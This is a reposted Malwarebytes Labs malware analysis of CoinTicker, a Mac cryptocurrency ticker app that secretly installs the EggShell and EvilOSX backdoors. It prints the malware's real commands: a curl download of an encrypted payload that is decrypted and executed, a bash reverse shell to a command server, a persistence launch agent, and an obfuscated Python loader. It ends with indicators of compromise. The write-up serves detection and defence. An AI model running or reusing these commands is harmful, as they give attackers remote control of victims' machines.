{"id":13708,"date":"2018-10-29T10:10:11","date_gmt":"2018-10-29T18:10:11","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7475\/"},"modified":"2018-10-29T10:10:11","modified_gmt":"2018-10-29T18:10:11","slug":"news-7475","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7475\/","title":{"rendered":"Mac cryptocurrency ticker app installs backdoors"},"content":{"rendered":"<p><strong>Credit to Author: Thomas Reed| Date: Mon, 29 Oct 2018 17:20:00 +0000<\/strong><\/p>\n<p>An astute contributor to our forums going by the handle <a href=\"https:\/\/forums.malwarebytes.com\/topic\/238544-coinsticker-with-rat-miner\/\" target=\"_blank\" rel=\"noopener\">1vladimir<\/a> noticed that an app named CoinTicker was exhibiting some fishy behavior over the weekend. It seems that the app is covertly installing not just one but two different backdoors.<\/p>\n<h3>Behaviors<\/h3>\n<p>The CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. Once downloaded, the app displays an icon in the menu bar that gives information about the current price of Bitcoin.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-menu-item.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"26122\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/attachment\/evilegg-menu-item\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-menu-item.png\" data-orig-size=\"272,180\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"EvilEgg menu item\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-menu-item.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-menu-item.png\" class=\"aligncenter size-full wp-image-26122\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-menu-item.png\" alt=\"\" width=\"272\" height=\"180\" \/><\/a><\/p>\n<p>The app&#8217;s preferences allow the user to customize the display, showing information about a wide variety of cryptocurrencies, including Bitcoin, Etherium, and Monero.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-currencies.png\" data-rel=\"lightbox-1\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"26123\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/attachment\/evilegg-currencies\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-currencies.png\" data-orig-size=\"500,478\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"EvilEgg currencies\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-currencies-300x287.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-currencies.png\" class=\"aligncenter size-full wp-image-26123\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-currencies.png\" alt=\"\" width=\"500\" height=\"478\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-currencies.png 500w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-currencies-300x287.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<p>Although this functionality seems to be legitimate, the app is actually up to no good in the background, unbeknownst to the user. Without any signs of trouble, such as requests for authentication to root, there&#8217;s nothing to suggest to the user that anything is wrong.<\/p>\n<p>When launched, however, the app downloads and installs components of two different open-source backdoors: EvilOSX and EggShell.<\/p>\n<p>The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS:<\/p>\n<pre>nohup curl -k -L -o \/tmp\/.info.enc https:\/\/github.com\/youarenick\/newProject\/raw\/master\/info.enc; openssl enc -aes-256-cbc -d -in \/tmp\/.info.enc -out \/tmp\/.info.py -k 111111qq; python \/tmp\/.info.py<\/pre>\n<p>The first part of the command downloads an encoded file from a Github page belonging to a user named &#8220;youarenick&#8221; and saves that file to a hidden file named <em>.info.enc<\/em> in <em>\/private\/tmp\/<\/em>. Next, it uses openssl to decode that file into a hidden Python file named <em>.info.py<\/em>. Finally, it executes the resulting Python script.<\/p>\n<p>The <em>.info.py<\/em> script performs multiple tasks. First it opens a reverse shell connection to a <a href=\"https:\/\/blog.malwarebytes.com\/glossary\/cc\/\" target=\"_blank\" rel=\"noopener\">command &amp; control server<\/a>, using the following command:<\/p>\n<pre>nohup bash &amp;&gt; \/dev\/tcp\/94.156.189.77\/2280 0&gt;&amp;1<\/pre>\n<p>(The domain <em>seednode3.parsicoin.net<\/em> resolves to this IP address.)<\/p>\n<p>Next, it downloads the the EggShell mach-o binary, saving it to <em>\/tmp\/espl<\/em>:<\/p>\n<pre>curl -k -L -o \/tmp\/espl https:\/\/github.com\/youarenick\/newProject\/raw\/master\/mac<\/pre>\n<p>Finally, it creates and runs a shell script at \/tmp\/.server.sh, which also establishes a reverse shell.<\/p>\n<pre>#! \/bin\/bash  nohup bash &amp;&gt; \/dev\/tcp\/94.156.189.77\/2280 0&gt;&amp;1<\/pre>\n<p>The CoinTicker app also creates a user launch agent, named <em>.espl.plist<\/em>, that runs the same command periodically:<\/p>\n<pre>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;  &lt;!DOCTYPE plist PUBLIC \"-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\" \"http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd\"&gt;  &lt;plist version=\"1.0\"&gt;  &lt;dict&gt;    &lt;key&gt;AbandonProcessGroup&lt;\/key&gt;    &lt;true\/&gt;    &lt;key&gt;Label&lt;\/key&gt;    &lt;string&gt;com.apple.espl&lt;\/string&gt;    &lt;key&gt;ProgramArguments&lt;\/key&gt;    &lt;array&gt;      &lt;string&gt;sh&lt;\/string&gt;      &lt;string&gt;-c&lt;\/string&gt;      &lt;string&gt;nohup curl -k -L -o \/tmp\/.info.enc https:\/\/github.com\/youarenick\/newProject\/raw\/master\/info.enc; openssl enc -aes-256-cbc -d -in \/tmp\/.info.enc -out \/tmp\/.info.py -k 111111qq; python \/tmp\/.info.py&lt;\/string&gt;    &lt;\/array&gt;    &lt;key&gt;RunAtLoad&lt;\/key&gt;    &lt;true\/&gt;    &lt;key&gt;StartInterval&lt;\/key&gt;    &lt;integer&gt;90&lt;\/integer&gt;  &lt;\/dict&gt;  &lt;\/plist&gt;<\/pre>\n<p>If it seems like this results in the espl binary being launched multiple times, that is indeed the case.<\/p>\n<div><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes.png\" data-rel=\"lightbox-2\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"26124\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/attachment\/evilegg-espl-processes\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes.png\" data-orig-size=\"800,600\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"EvilEgg espl processes\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes-300x225.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes-600x450.png\" class=\"aligncenter size-large wp-image-26124\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes-600x450.png\" alt=\"\" width=\"600\" height=\"450\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes-600x450.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes-300x225.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/EvilEgg-espl-processes.png 800w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/a><\/div>\n<p>The software also creates a folder within the user&#8217;s Containers folder named\u00a0<em>.UpQZdhkKfCdSYxg<\/em>, which is home to a Python script named\u00a0<em>plQqVfeJvGo<\/em>. (We believe these names are randomized, but unfortunately the CoinTicker app has stopped functioning, so we have been unable to confirm.) This script is encoded to hide the content:<\/p>\n<pre>#!\/usr\/bin\/env python  # -*- coding: utf-8 -*-  import os  import getpass  import uuid    def get_uid():  return \"\".join(x.encode(\"hex\") for x in (getpass.getuser() + \"-\" + str(uuid.getnode())))    exec(\"\".join(os.popen(\"echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9  ...  TjO1GlH1+7cP7pDYa8ykBquk4WhU0\/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5\" % get_uid()).readlines()))<\/pre>\n<p>Extracting the script reveals that it is the <em>bot.py<\/em> script from the EvilOSX backdoor made by Github user Marten4n6.<\/p>\n<pre>#!\/usr\/bin\/env python  # -*- coding: utf-8 -*-  \"\"\"Minimal bot which loads modules as they are needed from the server.\"\"\"  __author__ = \"Marten4n6\"  __license__ = \"GPLv3\"  __version__ = \"4.1.1\"  ...<\/pre>\n<p>This script has been customized to cause the backdoor to communicate with a server at\u00a0185.206.144.226 on port 1339.\u00a0The malware also creates a user launch agent named\u00a0<em>com.apple.EOFHXpQvqhr.plist<\/em> designed to keep this script running.<\/p>\n<h3>Implications<\/h3>\n<p>Although it&#8217;s unknown exactly what goal the hacker behind this malware had in mind, both EggShell and EvilOSX are broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is distributed through a cryptocurrency app, however, it seems likely that the malware is meant to gain access to users&#8217; cryptocurrency wallets for the purpose of stealing coins.<\/p>\n<p>At first, this looked like it could have been a supply chain attack, in which a legitimate app&#8217;s website is hacked to distribute a malicious version of the app. Such attacks have happened multiple times in the past, such as when the Transmission site was hacked (twice) to distribute KeRanger and Keydnap, or when a <a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/05\/handbrake-hacked-to-drop-new-variant-of-proton-malware\/\" target=\"_blank\" rel=\"noopener\">Handbrake mirror server<\/a> was hacked to distribute Proton.<\/p>\n<p>However, on further inspection, it looks like this app was probably never legitimate to begin with. First, the app is distributed via a domain named <em>coin-sticker.com<\/em>. This is close to, but not quite the same as, the name of the app. Getting the domain name wrong seems awfully sloppy if this were a legitimate app.\u00a0Adding further suspicion, it seems that this domain was just registered a few months ago on July 13.<\/p>\n<p>For this reason, <a href=\"https:\/\/malwarebytes.com\/mac\" target=\"_blank\" rel=\"noopener\">Malwarebytes for Mac<\/a> detects the CoinTicker application in addition to the other components of this malware, as OSX.EvilEgg.<\/p>\n<p>One interesting note about this malware is that none of it requires anything other than normal user permissions. Root permissions are not needed. There is often an erroneous over-emphasis on malware&#8217;s need for root privileges, but this malware is a perfect demonstration that malware does not need such privileges to have high potential for danger.<\/p>\n<h3>Indicators of Compromise<\/h3>\n<p>Files created:<\/p>\n<pre>\/private\/tmp\/.info.enc  \/private\/tmp\/.info.py  \/private\/tmp\/.server.sh  \/private\/tmp\/espl  ~\/Library\/LaunchAgents\/.espl.plist  ~\/Library\/LaunchAgents\/com.apple.[random string].plist  ~\/Library\/Containers\/.[random string]\/[random string]<\/pre>\n<p>Network connections:<\/p>\n<pre>94.156.189.77:2280  185.206.144.226:1339<\/pre>\n<p>SHA-256:<\/p>\n<pre>CoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4  espl efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490<\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/\">Mac cryptocurrency ticker app installs backdoors<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Thomas Reed| Date: Mon, 29 Oct 2018 17:20:00 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/' title='Mac cryptocurrency ticker app installs backdoors'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/10\/shutterstock_1025271412.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>A Mac application named CoinTicker has been found installing two different backdoors, capable of keylogging, data theft, execution of arbitrary commands, and more.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/mac-threat-analysis\/\" rel=\"category tag\">Mac<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/backdoor\/\" rel=\"tag\">backdoor<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/cryptocurrency\/\" rel=\"tag\">cryptocurrency<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/cryptomining\/\" rel=\"tag\">cryptomining<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/evilegg\/\" rel=\"tag\">evilegg<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/mac\/\" rel=\"tag\">mac<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/mac-backdoor\/\" rel=\"tag\">mac backdoor<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/mac-cryptocurrency\/\" rel=\"tag\">mac cryptocurrency<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/' title='Mac cryptocurrency ticker app installs backdoors'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/10\/mac-cryptocurrency-ticker-app-installs-backdoors\/\">Mac cryptocurrency ticker app installs backdoors<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[10836,11052,15080,19976,10454,12189,19977,10494],"class_list":["post-13708","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-backdoor","tag-cryptocurrency","tag-cryptomining","tag-evilegg","tag-mac","tag-mac-backdoor","tag-mac-cryptocurrency","tag-threat-analysis"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13708"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13708\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13708"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13708"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}